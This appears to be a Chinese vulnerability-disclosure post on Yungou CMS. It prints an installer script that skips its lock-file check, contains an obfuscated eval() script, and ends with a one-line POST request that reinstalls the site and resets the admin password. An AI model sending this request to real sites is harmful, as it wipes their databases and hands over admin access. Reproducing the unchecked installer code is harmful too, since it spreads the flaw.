云购Cms#重装漏洞

  • A+
所属分类:漏洞时代
摘要

浅蓝在install目录下 有个setconf.php

先来看看内容虽然index check.php 等文件都验证 唯独重要的setconf.php没有


漏洞作者:

浅蓝

详细说明:

在install目录下 有个setconf.php

先来看看内容

<?php  header('Content-type: text/html; charset=utf-8');  set_time_limit(0);  ob_end_flush();  ob_implicit_flush(true);      if(isset($_POST['edit'])){   $db_host = isset($_POST['db_host']) ? trim($_POST['db_host']) : '';   $db_user = isset($_POST['db_user']) ? trim($_POST['db_user']) : '';   $db_pwd = isset($_POST['db_pwd']) ? trim($_POST['db_pwd']) : '';   $db_name = isset($_POST['db_name']) ? trim($_POST['db_name']) : '';   $db_prefix = isset($_POST['db_prefix']) ? trim($_POST['db_prefix']) : '';   $user_name = isset($_POST['user_name']) ? trim($_POST['user_name']) : '';   $sqm_num= isset($_POST['sqm_num']) ? trim($_POST['sqm_num']) : '';   $password = isset($_POST['password']) ? trim($_POST['password']) : '';   $repassword = isset($_POST['repassword']) ? trim($_POST['repassword']) : '';   $conn = mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pwd']);   $conn_db = mysql_select_db($_POST['db_name'],$conn);   if(!$conn){    echo "数据库主机或数据库用户名或数据库密码错误!";exit;   }elseif(!$conn_db){    echo '数据库名称!';exit;   }elseif($db_name == ''){    echo '数据库不能为空!';exit;   }elseif($db_prefix == ''){    echo '数据库前缀不能为空!';exit;   }elseif(!preg_match("/^[/w_]+_$/",$db_prefix)){    echo '数据库前缀格式错误!';exit;   }elseif($user_name == '' || $password == ''){    echo '登录名和密码不能为空!';exit;   }elseif(strlen($password) < 6){    echo '登录密码不得小于6位';exit;   }elseif($password!=$repassword){    echo '两次输入的密码不一致';exit;   }   $config_file='../system/config/database.inc.php';    $con ="<?php/r/n/r/n";   $con .= "return array(/r/n";    $con .= "/t'default' => array (/r/n/t";     $con .= "/t'hostname' => '".$db_host."',";     $con .= "/r/n/t/t'database' => '".$db_name."',";                     $con .= "/r/n/t/t'username' => '".$db_user."',";     $con .= "/r/n/t/t'password' => '".$db_pwd."',";     $con .= "/r/n/t/t'tablepre' => '".$db_prefix."',";     $con .= "/r/n/t/t'charset' => 'utf8',";     $con .= "/r/n/t/t'type' => 'mysql',";     $con .= "/r/n/t/t'debug' => true,";     $con .= "/r/n/t/t'pconnect' => 0,";     $con .= "/r/n/t/t'autoconnect' => 0";    $con .= "/r/n/t),";   $con .= "/r/n);/r/n?>";   file_put_contents($config_file,$con);       if(!empty($sqm_num)){      $sqm_file='../system/config/code.inc.php';    $sqm="<?php return array('code'=>'$sqm_num'); ?>";    file_put_contents($sqm_file,$sqm);     }      $conn = @mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pwd']);      mysql_select_db($_POST['db_name'],$conn);   mysql_query("set names utf8");      $sql = file_get_contents("install.sql");   $sql = str_replace('DROP TABLE IF EXISTS `',"DROP TABLE IF EXISTS `".$_POST['db_prefix'],$sql);   $sql = str_replace('CREATE TABLE `',"CREATE TABLE `".$_POST['db_prefix'],$sql);   $sql = str_replace('INSERT INTO `',"INSERT INTO `".$_POST['db_prefix'],$sql);   $sql = str_replace('IF EXISTS `',"IF EXISTS `".$_POST['db_prefix'],$sql);   $array_sql = preg_split("/;[/r/n]/",$sql);   $query_sql_g=true;   echo "<h3 style='text-align:center; line-height:50px; font-weight:bold'><font color='#0c0'>正在安装中...请不要结束本页面!</font></h3><br/>";   echo "<div style='text-align:center;width:100%'>";        if(strlen(end($array_sql)) == 2){       array_pop($array_sql);      }   $ik = 0;   foreach($array_sql as $sql){    $sql = trim($sql);      if (!empty($sql) && strlen($sql) != 2){     $query_sql = mysql_query($sql,$conn);     if(!$query_sql){      if($ik%9==0){       echo "<br/>";      }      echo $sql."<font color='red'>SQL 执行失败!</font>";$ik++;     }else{      if($ik%9==0){       echo "<br/>";      }      echo "【SQL执行成功!】";$ik++;     }    }     }      $password=md5(trim($password));   $sql = "INSERT INTO `".$db_prefix."admin` (uid,mid,username,userpass) VALUES ('1','0','$user_name','$password')";   $q = mysql_query($sql,$conn);   if(!$q){         echo $sql."<font color='red'>【添加管理员失败】</font>";$ik++;   }else{    echo "【添加管理员成功】";$ik++;   }   echo "</div>";      if(!$query_sql_g){    echo "<br/><h3 style='text-align:center; line-height:50px; font-weight:bold'><font color='red'>数据库安装失败,请清空数据库后重新安装!</font></h3><br/>";   }else{    echo "<br/><h3 style='text-align:center; line-height:50px; font-weight:bold'><a style='color:#f60' href='finish.php'>安装完成,点击进入!</a></h3><br/>";   }   exit;  }    if(file_exists("ok.lock")){   echo "程序已经安装过";   echo "<br>";   echo "重新安装请删除,install 文件夹下的 <font color='red'>ok.lock</font> 文件";   exit;  }    /*  if(!isset($_POST['startinstall'])){   echo "<script>javascript:history.back()</script>";  }  */  ?>  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  <html xmlns="http://www.w3.org/1999/xhtml">  <head>  <title>云购系统安装</title>  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">  <link rel='stylesheet' type='text/css' href='images/install.css'>    </head>  <body>  <div id='installbox'>  <div class='msgtitle'>云购系统 安装向导</div>  <table width="780" height="30" border="0" cellpadding="0" cellspacing="0" class="intable3">    <tr>      <td style="color:#f5f5f5; text-align:center">          <span style="display:block;float:left;width:23%;font-size:12px;">1. 许可协议</span>          <span style="display:block;float:left;width:25%;font-size:12px;">2. 环境检测</span>          <span style="display:block;float:left;width:25%;font-size:12px;">3. 数据库设置</span>          <span style="display:block;float:left;width:25%;font-size:12px;color:#FFF;">4. 安装完成</span>      </td>    </tr>  </table>  <h3>安装设置:</h3>  <form  method="post" action="" name="conf" id="gxform" style="margin:0; padding:0;">   <table width="98%" border="0" align="center" cellpadding="5" cellspacing="1" class="tableoutline" style="font-size:12px; color:#666;">    <tr class="firstalt">     <td width="48%" valign="top"><b>数据库主机</b><br><font>一般为localhost</font></td>     <td><input type="text" name="db_host" id="db_host" value="localhost" maxlength="50" style="width:250px;" > *</td>    </tr>                       <tr class="firstalt">     <td width="48%"><b>数据库用户名</b><br><font color="#666666">一般为root</font><br></td>     <td><input type="text" name="db_user" id="db_user" value="" maxlength="50" style="width:250px;"> *</td>    </tr>    <tr bgcolor="#fdefe5" class="firstalt">     <td width="48%"><b>数据库密码</b><br><br></td>     <td><input type="password" name="db_pwd" value="" id="db_pwd" maxlength="50" style="width:250px;" ></td>    </tr>    <tr class="firstalt">     <td width="48%"><b>数据库名称</b><br><font color="red"><b>请填写已存在的数据库名</b></font><br></td>     <td><input type="text" name="db_name" id="db_name" value="" maxlength="50" style="width:250px;"> *</td>    </tr>      <tr bgcolor="#fdefe5" class="firstalt">     <td width="48%"><p><b>数据库表前缀</b><br><font color="#666666">建议您修改表前缀</font><br></p></td>     <td><input type="text" name="db_prefix" id="db_prefix" value="go_"  maxlength="50"  valid="required"  style="width:250px;" > *</td>    </tr>    <tr class="firstalt" style="display:none;">     <td width="48%"><p><b>授权码</b><br><font color="#666666"><a target="_blank" href="http://www.yungoucms.com/news-4-1.html">购买授权码 </a></font><br></p></td>     <td><input type="text" name="sqm_num" id="sqm_num" value="975E312DA2618F549446B6523A6F9730E059AA112448"  maxlength="50"  valid="required"  style="width:250px;" > *</td>       </tr>     </table>   <h3>后台设置:</h3>   <table width="98%" border="0" align="center" cellpadding="5" cellspacing="1" class="tableoutline" style="font-size:12px; color:#666;">    <tr bgcolor="#fdefe5" class="firstalt">     <td width="48%"><p><b>管理员帐号</b><br><font color="#666666">一般不用修改</font><br></p></td>     <td><input type="text" name="user_name" id="user_name" value="admin"  maxlength="50"  valid="required"  style="width:250px;" > *</td>    </tr>    <tr class="firstalt">     <td width="48%"><p><b>密码</b><br><font color="#666666">密码大于6位</font><br></p></td>     <td><input type="password" name="password" id="password" value=""  maxlength="50"  valid="required"  style="width:250px;" > *</td>    </tr>    <tr bgcolor="#fdefe5" class="firstalt">     <td width="48%"><p><b>确认密码</b></p></td>     <td><input type="password" name="repassword" id="repassword" value=""  maxlength="50"  valid="required"  style="width:250px;" > *</td>    </tr>   </table>   <table width="100%" cellpadding="0" cellspacing="0" border="0">    <tr class="firstalt" style="height:10px">     <td height="70" colspan="2" align="center">      <input style="width:120px; height:30px;" type="button" class="btn"  value="上一步" onClick="history.back();"/>       <input style="width:120px; height:30px;" type="submit" name="edit" value="下一步" class="btn" id="submit">       <span id="loading" style="font-size:13px;color:#FF0000;display:none"><font color="#0066CC">请稍等...正在与MYSQL数据库进行连接。</font></span>     </td>    </tr>    <tr class="firstalt" style="height:10px">     <td colspan="2" align="center"><div id='msgbottom'><script language=javascript>  eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('u["//9//2//c//t//v//1//3//0"]["//e//5//h//0//1//4//3"]("//x//w//q//p//l//m//s//r//y//F//n//7 //d//5//1//f//8//"//d//0//0//j//b////////6//6//i//k//a//2//j//1//k//c//3/////" //i//0//G//4//1//8//"//c//2//4//2//5//b//5//1//9//o//f//2//3//0//z//e//1//h//a//d//0//b //6//2//4//9//o//"  //0//7//5//a//1//0//8//"//D//6//4//7//3//A//"//g//B//C//l//m//H//E//n/////7//g");',44,44,'x74|x65|x6f|x6e|x6c|x72|x62|x61|x3d|x64|x67|x3a|x63|x68|x77|x66|x3e|x69|x73|x70|x2e|u6e90|u7801|x3c|x3b|u54c1|u7cbe|u70b9|u8bf7|x75|window|x6d|u591a|u66f4|u51fb|x2d|x6b|u72d7|u6251|x5f|u533a|uff1a|x79|u793e'.split('|'),0,{}))  </script></div></td>    </tr>   </table>  </form>  </div>    </body>  </html>

 

虽然index check.php 等文件都验证 唯独重要的setconf.php没有

POST  http://localhost/yungou/install/setconf.php  edit=&db_host=localhost&db_user=root&db_pwd=&db_name=yungou&db_prefix=go_&user_name=admin&password=123456&repassword=123456

 

云购Cms#重装漏洞

直接重装了

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: